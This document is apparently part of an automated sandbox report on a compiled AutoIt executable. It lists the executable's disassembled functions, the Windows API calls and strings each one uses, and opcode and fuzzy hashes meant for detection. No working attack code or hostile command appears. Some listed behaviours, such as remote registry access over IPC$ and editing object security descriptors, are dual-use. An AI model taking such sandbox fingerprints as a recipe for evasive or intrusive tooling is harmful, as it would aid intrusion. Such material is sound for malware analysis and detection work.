                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3840717409-0
                                                                        • Opcode ID: 3a04d72e4fb58082d8b1a47ceb050c0aca730e99191b073b368abe246ecb4554
                                                                        • Instruction ID: e8d97edd6e8591e353b4ad806ea67b44a0199916c7b356168f76dc69267c6e57
                                                                        • Opcode Fuzzy Hash: 3a04d72e4fb58082d8b1a47ceb050c0aca730e99191b073b368abe246ecb4554
                                                                        • Instruction Fuzzy Hash: 8D413675600208AFDB11AF66DC8CEAE7BBAEB89715F108059F906AA360C7309945DB60
                                                                        Function 00EC05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 00EC076F
                                                                        • _wcscat.LIBCMT ref: 00EC0787
                                                                        • _wcscat.LIBCMT ref: 00EC0799
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EC07AE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC07C2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00EC07DA
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EC07F4
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0806
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                        • String ID: *.*
                                                                        • API String ID: 34673085-438819550
                                                                        • Opcode ID: 10e5e335df6845ffba23bed802eb148a8653b584408b5d83efdcd399faa534f7
                                                                        • Instruction ID: c352af42980a5d5741fab291ea201272f90548f5880b9766575df92ae51945e2
                                                                        • Opcode Fuzzy Hash: 10e5e335df6845ffba23bed802eb148a8653b584408b5d83efdcd399faa534f7
                                                                        • Instruction Fuzzy Hash: 28818171504301DFCB24EF64C945EAEB7E8AFC8308F14982EF989E7251E731D9568B92
                                                                        Function 00EDEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EDEF3B
                                                                        • GetFocus.USER32 ref: 00EDEF4B
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00EDEF56
                                                                        • _memset.LIBCMT ref: 00EDF081
                                                                        • GetMenuItemInfoW.USER32 ref: 00EDF0AC
                                                                        • GetMenuItemCount.USER32(00000000), ref: 00EDF0CC
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00EDF0DF
                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00EDF113
                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00EDF15B
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EDF193
                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EDF1C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1296962147-4108050209
                                                                        • Opcode ID: fc99f644b4c999172b94e51d308b65aee85e1267a80a4afed764d830a4a913fd
                                                                        • Instruction ID: 76d6a0096e31286d58992850c225d68568cebff6f8e9cb636d60820687ba787b
                                                                        • Opcode Fuzzy Hash: fc99f644b4c999172b94e51d308b65aee85e1267a80a4afed764d830a4a913fd
                                                                        • Instruction Fuzzy Hash: BF817B70609311EFD710DF15C884A6BBBE9FB88318F00552EF999A7392D770D906CB92
                                                                        Function 00EAA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EAABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EAABD7
                                                                          • Part of subcall function 00EAABBB: GetLastError.KERNEL32(?,00EAA69F,?,?,?), ref: 00EAABE1
                                                                          • Part of subcall function 00EAABBB: GetProcessHeap.KERNEL32(00000008,?,?,00EAA69F,?,?,?), ref: 00EAABF0
                                                                          • Part of subcall function 00EAABBB: HeapAlloc.KERNEL32(00000000,?,00EAA69F,?,?,?), ref: 00EAABF7
                                                                          • Part of subcall function 00EAABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EAAC0E
                                                                          • Part of subcall function 00EAAC56: GetProcessHeap.KERNEL32(00000008,00EAA6B5,00000000,00000000,?,00EAA6B5,?), ref: 00EAAC62
                                                                          • Part of subcall function 00EAAC56: HeapAlloc.KERNEL32(00000000,?,00EAA6B5,?), ref: 00EAAC69
                                                                          • Part of subcall function 00EAAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EAA6B5,?), ref: 00EAAC7A
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EAA8CB
                                                                        • _memset.LIBCMT ref: 00EAA8E0
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EAA8FF
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00EAA910
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00EAA94D
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EAA969
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00EAA986
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EAA995
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00EAA99C
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EAA9BD
                                                                        • CopySid.ADVAPI32(00000000), ref: 00EAA9C4
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EAA9F5
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EAAA1B
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EAAA2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: acf39f40918ba5ad3479b67e7d8dcb0badf1b81444e92bc1f18866cfa37710e4
                                                                        • Instruction ID: b398e76d89a31d8765863bd3785076674ae50152fa0782f8ed4adc723c9da8f5
                                                                        • Opcode Fuzzy Hash: acf39f40918ba5ad3479b67e7d8dcb0badf1b81444e92bc1f18866cfa37710e4
                                                                        • Instruction Fuzzy Hash: F8515D75900209AFDF00DF91DC44AEEBBBAFF49304F089129E815BA290DB30AA05CB61
                                                                        Function 00EC9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00EC9E36
                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EC9E42
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00EC9E4E
                                                                        • SelectObject.GDI32(00000000,?), ref: 00EC9E5B
                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EC9EAF
                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00EC9EEB
                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EC9F0F
                                                                        • SelectObject.GDI32(00000006,?), ref: 00EC9F17
                                                                        • DeleteObject.GDI32(?), ref: 00EC9F20
                                                                        • DeleteDC.GDI32(00000006), ref: 00EC9F27
                                                                        • ReleaseDC.USER32(00000000,?), ref: 00EC9F32
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID: (
                                                                        • API String ID: 2598888154-3887548279
                                                                        • Opcode ID: 97d6c295e07ea0a436a5169983b451502807814d1fd193bb83fc9367ec29d847
                                                                        • Instruction ID: 8db77bfa7d116a1b60798c87ff31a76c7658b20beece266d277fc56cc7bc040f
                                                                        • Opcode Fuzzy Hash: 97d6c295e07ea0a436a5169983b451502807814d1fd193bb83fc9367ec29d847
                                                                        • Instruction Fuzzy Hash: 65514A75904309EFCB14CFA9CC89EAEBBBAEF88710F14841DF95AA7210C731A945CB50
                                                                        Function 00EBCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2889450990-2391861430
                                                                        • Opcode ID: 2d5ecdf89aba18432ba7849dd299b5badf8cd2ed07e7f9b817a52c93382610fd
                                                                        • Instruction ID: c7bfdc6afa5c680a37451353f39fd2701481f33cc80affa8085a65a491c5cf4a
                                                                        • Opcode Fuzzy Hash: 2d5ecdf89aba18432ba7849dd299b5badf8cd2ed07e7f9b817a52c93382610fd
                                                                        • Instruction Fuzzy Hash: 6B518072800619BACF14EBE0DD42EEEB7B9EF05304F205165F509720A2EB70AF59DB61
                                                                        Function 00EBCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2889450990-3420473620
                                                                        • Opcode ID: a13dfc02d8e1bb236442617cb9a6dd4e679d54ecc4bec83950ea4b472c5e05e9
                                                                        • Instruction ID: d9f500b3455a9dcf174927383d2f01f627dc5063adf118176210815f58aa8225
                                                                        • Opcode Fuzzy Hash: a13dfc02d8e1bb236442617cb9a6dd4e679d54ecc4bec83950ea4b472c5e05e9
                                                                        • Instruction Fuzzy Hash: 1651A072800619AACF14EBE0DD42EEEB7B9AF05304F209065F509720A2EB746F59DF61
                                                                        Function 00EB55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB55D7
                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00EB5664
                                                                        • GetMenuItemCount.USER32(00F31708), ref: 00EB56ED
                                                                        • DeleteMenu.USER32(00F31708,00000005,00000000,000000F5,?,?), ref: 00EB577D
                                                                        • DeleteMenu.USER32(00F31708,00000004,00000000), ref: 00EB5785
                                                                        • DeleteMenu.USER32(00F31708,00000006,00000000), ref: 00EB578D
                                                                        • DeleteMenu.USER32(00F31708,00000003,00000000), ref: 00EB5795
                                                                        • GetMenuItemCount.USER32(00F31708), ref: 00EB579D
                                                                        • SetMenuItemInfoW.USER32(00F31708,00000004,00000000,00000030), ref: 00EB57D3
                                                                        • GetCursorPos.USER32(?), ref: 00EB57DD
                                                                        • SetForegroundWindow.USER32(00000000), ref: 00EB57E6
                                                                        • TrackPopupMenuEx.USER32(00F31708,00000000,?,00000000,00000000,00000000), ref: 00EB57F9
                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EB5805
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 3993528054-0
                                                                        • Opcode ID: d5dec0ee04a5399605a278723a05e4d6218348b150994995425805150712f022
                                                                        • Instruction ID: 9e97fec1d231138eef87cfde2c00850b54e317eac170b3a6028ce42ae9f210e6
                                                                        • Opcode Fuzzy Hash: d5dec0ee04a5399605a278723a05e4d6218348b150994995425805150712f022
                                                                        • Instruction Fuzzy Hash: 51710172640A15BEEB209F55CC49FEBBFA5FF44368F244216F6187A1D1CBB0A810DB91
                                                                        Function 00EAA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EAA1DC
                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EAA211
                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EAA22D
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EAA249
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EAA273
                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00EAA29B
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EAA2A6
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EAA2AB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 1687751970-22481851
                                                                        • Opcode ID: c01e794caab8e148729de8f0affe10cfe67cf1320b21753db0c70157b271921b
                                                                        • Instruction ID: e54f9c87f618a8c0e69a73a71e64bb3e3484d677e370fc9cc67fa7fabca994ad
                                                                        • Opcode Fuzzy Hash: c01e794caab8e148729de8f0affe10cfe67cf1320b21753db0c70157b271921b
                                                                        • Instruction Fuzzy Hash: A7410772C10229AECB15EBA4DC85DEDB7B9FF08304F04906AF805B7160EB70AE05CB60
                                                                        Function 00ED3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        • Opcode ID: ebf4766ab01776dda585902a09c2bc6c4582e97bcda515134a4ffc730ec0b7fe
                                                                        • Instruction ID: 388f32f6be28aa45821e73dc1e6c8a356e9fd3bc176e86cc2345124a4ad626d8
                                                                        • Opcode Fuzzy Hash: ebf4766ab01776dda585902a09c2bc6c4582e97bcda515134a4ffc730ec0b7fe
                                                                        • Instruction Fuzzy Hash: CE4150305142898FCF00EF20E8516EA73A6EF52304F106815EC997B396EB70AE0BDF11
                                                                        Function 00EB25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EE36F4,00000010,?,Bad directive syntax error,00F0DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00EB25D6
                                                                        • LoadStringW.USER32(00000000,?,00EE36F4,00000010), ref: 00EB25DD
                                                                        • _wprintf.LIBCMT ref: 00EB2610
                                                                        • __swprintf.LIBCMT ref: 00EB2632
                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EB26A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 1080873982-4153970271
                                                                        • Opcode ID: 0a6d1aca57ce282c1174ea52ee860f477d98d09ad05acc2d9af9d5e2deb04c94
                                                                        • Instruction ID: 4fa9b964755c9c9a8f9b95be58f5df1a1df8be3e0b459b6c3e41484f9c7f85f6
                                                                        • Opcode Fuzzy Hash: 0a6d1aca57ce282c1174ea52ee860f477d98d09ad05acc2d9af9d5e2deb04c94
                                                                        • Instruction Fuzzy Hash: 7B215E7280021AFFCF11AB90CC4AEEE7BB9FF19304F005459F509760A2EB71A619EB51
                                                                        Function 00EB7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EB7B42
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EB7B58
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EB7B69
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EB7B7B
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EB7B8C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: SendString
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 890592661-1007645807
                                                                        • Opcode ID: 2d703e4487fd405eacf69da343e4ed3ff9979a04b3418d561eaa532857430bf6
                                                                        • Instruction ID: 7bee80acf9b796d6474da7a16082b65f2faa63c6627c083603ab1f57559b93ed
                                                                        • Opcode Fuzzy Hash: 2d703e4487fd405eacf69da343e4ed3ff9979a04b3418d561eaa532857430bf6
                                                                        • Instruction Fuzzy Hash: 9211C4F1A5426979DB20B361DC8ADFF7BBCEBD1B10F00142AB415B60D1DEB05A45C9B2
                                                                        Function 00EB778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00EB7794
                                                                          • Part of subcall function 00E8DC38: timeGetTime.WINMM(?,75C0B400,00EE58AB), ref: 00E8DC3C
                                                                        • Sleep.KERNEL32(0000000A), ref: 00EB77C0
                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00EB77E4
                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00EB7806
                                                                        • SetActiveWindow.USER32 ref: 00EB7825
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EB7833
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EB7852
                                                                        • Sleep.KERNEL32(000000FA), ref: 00EB785D
                                                                        • IsWindow.USER32 ref: 00EB7869
                                                                        • EndDialog.USER32(00000000), ref: 00EB787A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
